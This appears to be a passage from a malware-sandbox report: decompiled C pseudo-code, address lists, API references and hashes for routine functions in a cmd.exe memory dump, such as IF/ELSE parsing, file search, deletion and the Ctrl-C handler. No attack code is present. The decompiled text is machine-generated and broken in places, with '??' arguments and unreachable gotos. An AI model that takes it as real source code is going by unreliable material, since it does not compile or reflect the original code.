									if(_t173 == 3) {
										_t76 =  *0x1f3cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E001C00B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0x1f3cd4;
											 *0x1f3cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E001C0178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E001D9953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E001C274C(0x1f3d00, 0x104, L"%d",  *_t166);
																			_push(0x1f3d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E001BDBCE(_t92,  *_t166);
																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E001C274C(0x1f3d00, 0x104, L"%d",  *_t166);
																		_push(0x1f3d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E001BC5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E001BD937();
																		goto L52;
																	} else {
																		E001BDB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E001BDBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E001BD120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E001C3320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E001BD120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E001BD937();
																					E001D985A( *0x1f3cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E001BDBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E001BDB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E001BD937();
																							E001C274C(0x1f3d00, 0x104, L"%d",  *_t166);
																							E001BC5A2(_t127, 0x2344, 1, 0x1f3d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E001C6FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E001C1040(_t68,  *0x1efa8c, 0x1efaa0);
								_t144 = 0x2c;
								_t100 = E001BDC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
									E001D82EB(_t144);
								}
								goto L13;
							}
						} else {
							E001BF300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}

0x001bd803
0x001bd812
0x001bd814
0x001bd81c
0x001bd81e
0x001cb9cf
0x001cb9d5
0x001cb9d5
0x001bd826
0x001bd82c
0x001bd830
0x001cb9dd
0x001cb9de
0x001cb9e6
0x001cb9e7
0x001cb9ef
0x001bd836
0x001bd838
0x001bd838
0x001bd83f
0x001bd840
0x001bd847
0x001cb9fa
0x001cb9fe
0x00000000
0x001bd84d
0x001bd84d
0x001bd855
0x001bd871
0x001bd873
0x001bd877
0x001bd857
0x001bd861
0x001bd86b
0x001bd91b
0x00000000
0x00000000
0x00000000
0x001bd86b
0x001bd87e
0x001bd883
0x001bd888
0x001bd921
0x001bd924
0x001bd932
0x001bd932
0x001bd926
0x001bd926
0x001bd894
0x001bd895
0x001bd89a
0x001bd89f
0x001cba09
0x001cba09
0x001bd8ac
0x001bd8d7
0x001bd8dc
0x001bd8ae
0x001bd8b0
0x001bd8c0
0x001bd8ca
0x001bd8e2
0x001bd8e5
0x001bd8ea
0x001bd8ec
0x001cba13
0x001cba1f
0x001cba25
0x001cba26
0x001cba26
0x001cba28
0x001bda46
0x001bda46
0x001bda49
0x001bda4b
0x001bda4d
0x00000000
0x00000000
0x001bd9f1
0x001bd9f4
0x001bd9f6
0x001bd9f9
0x001bd9f9
0x001bd9fc
0x001bd9ff
0x001bd9ff
0x001bda08
0x001bda10
0x001bda14
0x001bda19
0x001bda1c
0x001bda1e
0x001bda21
0x001bda23
0x001bda26
0x001bda26
0x001bda29
0x001bda2c
0x001bda2c
0x001bda35
0x001bda36
0x001bda39
0x001bda3b
0x001bda40
0x00000000
0x00000000
0x001bda40
0x001bda39
0x001bda1c
0x001bda4f
0x001bda55
0x001bda5b
0x001bda5e
0x001cba31
0x001cba36
0x00000000
0x001bda64
0x001bda66
0x001bda67
0x001bda6c
0x001bda72
0x001bda74
0x001bdb8d
0x001bdb8f
0x001bda7a
0x001bda80
0x001bda83
0x001bda88
0x001bda8b
0x001bda8d
0x001bda8d
0x001bda90
0x001bda92
0x001bda98
0x001bda98
0x001bda9b
0x001bda9b
0x001bda9e
0x00000000
0x001bdaa4
0x001bdaa6
0x001bdaad
0x001bdaaf
0x001cba90
0x001cba90
0x00000000
0x001bdab5
0x001bdab7
0x001bdabe
0x001bdac1
0x00000000
0x001bdac7
0x001bdac9
0x001bdace
0x001bdad0
0x001cba43
0x001cba48
0x001cba4a
0x00000000
0x001cba50
0x001cba56
0x001cba5c
0x001cba5e
0x001cba64
0x001cba66
0x00000000
0x001cba6c
0x001cba7e
0x001cba83
0x001cba84
0x001cba86
0x00000000
0x001cba86
0x001cba66
0x001bdad6
0x001bdad6
0x001bdad6
0x001bdad8
0x001bdadd
0x001bdae0
0x001bdae2
0x001cbb36
0x001cbb3b
0x001cbb3c
0x001cbb3e
0x001cbb43
0x001cbb43
0x001cbb4b
0x001cbb4e
0x00000000
0x001bdae8
0x001bdaea
0x001bdaef
0x001bdaef
0x001bdaf2
0x001bdaf6
0x001bdb6f
0x001bdb76
0x001bdb7c
0x001bdb7f
0x001bdb84
0x001bdb86
0x00000000
0x001bdb88
0x00000000
0x001bdb88
0x001bdaf8
0x001bdaf8
0x001bdafd
0x001bdafe
0x001cba98
0x001cba9d
0x001cbaa2
0x001cbaa8
0x001cbaaa
0x00000000
0x001cbab0
0x001cbab5
0x001cbaba
0x001cbabc
0x00000000
0x001cbac2
0x001cbac2
0x001cbac5
0x001cbac7
0x001cbac9
0x001cbac9
0x001cbad9
0x001cbadf
0x001cbae1
0x00000000
0x001cbae7
0x001cbae7
0x001cbaea
0x001cbaec
0x001cbaee
0x001cbaee
0x001cbaf4
0x001cbaf5
0x00000000
0x001cbaf5
0x001cbae1
0x001cbabc
0x001bdb04
0x001bdb09
0x001bdb11
0x001bdb11
0x001bdb17
0x001bdb17
0x001bdb1c
0x001bdb22
0x001bdb24
0x001cbb89
0x001cbb89
0x001cbb94
0x00000000
0x001bdb2a
0x001bdb2a
0x001bdb2a
0x001bdb2c
0x001cbaff
0x001cbb03
0x001cbb08
0x001cbb0e
0x001cbb10
0x001cbb15
0x001cbb18
0x001cbb58
0x001cbb58
0x001cbb6f
0x001cbb7c
0x00000000
0x001cbb1a
0x001cbb1a
0x001cbb1c
0x00000000
0x001cbb1c
0x001bdb32
0x001bdb32
0x001bdb32
0x001bdb34
0x00000000
0x001bdb3a
0x001bdb40
0x00000000
0x001bdb40
0x001bdb34
0x001bdb2c
0x001bdb24
0x001bdafe
0x001bdaf6
0x001bdae2
0x001bdad0
0x001bdac1
0x001bdaaf
0x00000000
0x001bdb43
0x001bdb43
0x001bdb46
0x001bdb48
0x001bdb48
0x001bda9b
0x001bda92
0x001bda74
0x001bdb50
0x001bdb53
0x001bdb5f
0x001bdb60
0x001bdb61
0x001bdb63
0x001bdb6c
0x00000000
0x001bdb6c
0x001bd8f2
0x001bd8fb
0x001bd8fe
0x001bd905
0x001bd906
0x001bd90b
0x001bd90e
0x001bd910
0x001bd912
0x001bd912
0x00000000
0x001bd910
0x001bd8cc
0x001bd8d2
0x00000000
0x001bd8d2
0x001bd8ca
0x001bd8ac
0x00000000

APIs

_wcsicmp.MSVCRT ref: 001BD814
_wcsicmp.MSVCRT ref: 001BD861
_wcsicmp.MSVCRT ref: 001BD8C0

Strings

IF/?, xrefs: 001BD80D
ELSE, xrefs: 001BD8BB

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: ELSE$IF/?
API String ID: 2081463915-1134991328
Opcode ID: a1effa85eb33a785a925730797b06f5f65cab22d34237efbd77c0fe5b61f6c7e
Instruction ID: 925ff38f9ded894e96e5f4c9844cc8693b503ab8af59c1ce37c4404d049330c5
Opcode Fuzzy Hash: a1effa85eb33a785a925730797b06f5f65cab22d34237efbd77c0fe5b61f6c7e
Instruction Fuzzy Hash: 2A61E6316046419BDB28AF35EC96BAAB3A1EF94310F25453EE406DB6E1EF71DC41C740

Uniqueness

Uniqueness Score: -1.00%

Function 001C68BA Relevance: 15.1, APIs: 10, Instructions: 114
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C68BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E001C6A00) {
						 *0x1f94b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E001C6A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0x1f3cf0 =  *0x1f3cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0x1f3cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0x1dd5dc; // 0x0
								if(_t48 >=  *0x1f3cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0x1f3cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0x1f3cf8 =  *0x1f3cf8 + 1;
										L17:
										_t48 =  *0x1dd5dc; // 0x0
										 *0x1f3cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0x1dd5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E001C6FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0x1f3cf0 = GetLastError();
				goto L13;
			}

0x001c68ba
0x001c68bf
0x001c68c0
0x001c68c1
0x001c68c8
0x001c68d4
0x001c68dc
0x001c68e6
0x001c68ec
0x001c68ef
0x001c68f1
0x001c68f3
0x001c68f8
0x001c68fe
0x001c6906
0x001c699a
0x001c69a3
0x001c69a5
0x001c690c
0x001c690c
0x001c690c
0x001c6913
0x001c69e2
0x001c69ed
0x001c69f3
0x001c69f6
0x00000000
0x001c69e4
0x001c69e4
0x00000000
0x001c69e4
0x001c6919
0x001c6919
0x001c6920
0x001c6922
0x001c6925
0x001c6951
0x001c6953
0x00000000
0x00000000
0x001c6955
0x001c6955
0x001c6927
0x001c6927
0x001c692f
0x001c6988
0x00000000
0x001c6931
0x001c6931
0x001c693d
0x001c69c4
0x001c69c8
0x001d154f
0x001d1554
0x001d155a
0x001d155d
0x001c69ce
0x001c69ce
0x001c698a
0x001c698a
0x001c6990
0x00000000
0x001c6990
0x001c693f
0x001c693f
0x001c6941
0x001c6945
0x001c6949
0x001c6949
0x001c694f
0x00000000
0x001c694f
0x001c693d
0x001c692f
0x001c6925
0x001c695a
0x001c695b
0x001c695e
0x001c6967
0x001c6967
0x001c6970
0x00000000

APIs

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,001C6A00,001C6A00,?,001BAE4F,00000037,00000000,?), ref: 001C68E6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001BAE4F,00000037,00000000,?,?), ref: 001C696A
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,001BAE4F,00000037,00000000,?,?), ref: 001C697B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BAE4F,00000037,00000000,?,?), ref: 001C6982
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,001BAE4F,00000037,00000000,?,?), ref: 001C69B7
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BAE4F,00000037,00000000,?,?), ref: 001C69BE
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,001BAE4F,00000037,00000000,?,?), ref: 001C69DA
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(001BAE4F,?,001BAE4F,00000037,00000000,?,?), ref: 001C69ED

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
String ID:
API String ID: 1047556133-0
Opcode ID: d96251bbb8449bccf90cca79c51603a4ec63ada1b4eff6b4972dd987c470ac5f
Instruction ID: 201b63ce27fd899a6676472a007f359305270dff6c839f0b7feac12995a5c479
Opcode Fuzzy Hash: d96251bbb8449bccf90cca79c51603a4ec63ada1b4eff6b4972dd987c470ac5f
Instruction Fuzzy Hash: 2C41B670201201EFCB149F64EC09F797BB5FBA5325F10461DF9A2976A0DB31D981DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B83F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E001B83F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E001B84BE(_v8) != 0) {
						_t49 = E001D9AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}

0x001b83fd
0x001b83ff
0x001b8407
0x001d036d
0x001d0376
0x001d0382
0x001d0382
0x001b84b5
0x001b84bd
0x001b84bd
0x001b840d
0x001b8416
0x001b841b
0x001b8423
0x00000000
0x00000000
0x001b842d
0x001d0353
0x001d0356
0x001b8433
0x001b8433
0x001b8435
0x001b8438
0x001b8438
0x001b8440
0x001b844c
0x001b845c
0x001b8464
0x001b8467
0x001b846a
0x001b846d
0x001b8479
0x001b8483
0x001b848b
0x00000000
0x001b8491
0x001b849b
0x001d0366
0x001b84a1
0x001b84a3
0x001b84a3
0x001b84a7
0x001b84af
0x00000000
0x00000000
0x00000000
0x00000000
0x001b84af

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL(?,?,00000000,?), ref: 001B841B
NtOpenFile.NTDLL ref: 001B846D
RtlReleaseRelativeName.NTDLL ref: 001B8479
RtlFreeUnicodeString.NTDLL(?), ref: 001B8483

Part of subcall function 001B84BE: NtQueryVolumeInformationFile.NTDLL ref: 001B84EA

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 001B84A7
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 001D036E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B8393), ref: 001D037C

Strings

@, xrefs: 001B845C

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @
API String ID: 2968197161-2766056989
Opcode ID: 8d1a4f839fdf53b1ad2ad3b718b2613ac0e6deb572937f2f66fef600cf513970
Instruction ID: e95a8d7d9a7934d1f6f014e5a53b41f460ea8afacb68f1efdca2083781b6ee8f
Opcode Fuzzy Hash: 8d1a4f839fdf53b1ad2ad3b718b2613ac0e6deb572937f2f66fef600cf513970
Instruction Fuzzy Hash: DB210A71E00219AFCB14DFA5DD48BEEBBBCBB48750F104166EA15E7250EB349E05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D6D90 Relevance: 13.6, APIs: 9, Instructions: 67
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001D6D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0x1e3858);
					 *0x1dd544 = 1;
					LeaveCriticalSection( *0x1e3858);
					if( *0x1dd0db != 0 &&  *0x1f3cc4 != 0) {
						_push("^C");
						_t10 = E001C7721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E001C7721(fprintf(_t10, ??), 2));
					}
					if( *0x1eb938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0x1f7f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0x1eb938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0x1f7f20);
						}
					}
					if(E001C7797(_t13) == 0) {
						_t7 = E001C0178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}

0x001d6d90
0x001d6d95
0x001d6d96
0x001d6d9f
0x001d6db3
0x001d6dbf
0x001d6dc5
0x001d6dd2
0x001d6ddd
0x001d6de4
0x001d6de9
0x001d6df9
0x001d6dff
0x001d6e09
0x001d6e12
0x001d6e1a
0x001d6e28
0x001d6e2f
0x001d6e2f
0x001d6e35
0x001d6e3d
0x001d6e41
0x001d6e48
0x001d6e4c
0x001d6e54
0x001d6e54
0x001d6e48
0x001d6e5a
0x001d6da6
0x001d6da6
0x001d6da6
0x001d6e60

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D6DB3
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001D6DC5
fprintf.MSVCRT ref: 001D6DEB
fflush.MSVCRT ref: 001D6DF9
TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D6E12
NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 001D6E28
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001D6E2F
_get_osfhandle.MSVCRT ref: 001D6E4C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001D6E54

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
String ID:
API String ID: 3139166086-0
Opcode ID: dbd0ad6a3d00825af99565189b9db7743f8acc7a36c3cef444aebbee9481d505
Instruction ID: 58e2561fc6bc14825576c70e371ddf2a70b05603140295b5ae4b2f33b5b140a8
Opcode Fuzzy Hash: dbd0ad6a3d00825af99565189b9db7743f8acc7a36c3cef444aebbee9481d505
Instruction Fuzzy Hash: 2F11D031105200BBDB15ABB4EC8EF7E7B68EB14752F04011AF51595AE1CB7598C1CA51

Uniqueness

Uniqueness Score: -1.00%

Function 001C5FC8 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001C5FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
				E001C62FA(E001C3320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E001BEA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E001C62FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						E001D5CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E001C22C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E001C1040(_t162, _t14, _t98);
					_t100 = E001C3B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0x1f3cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
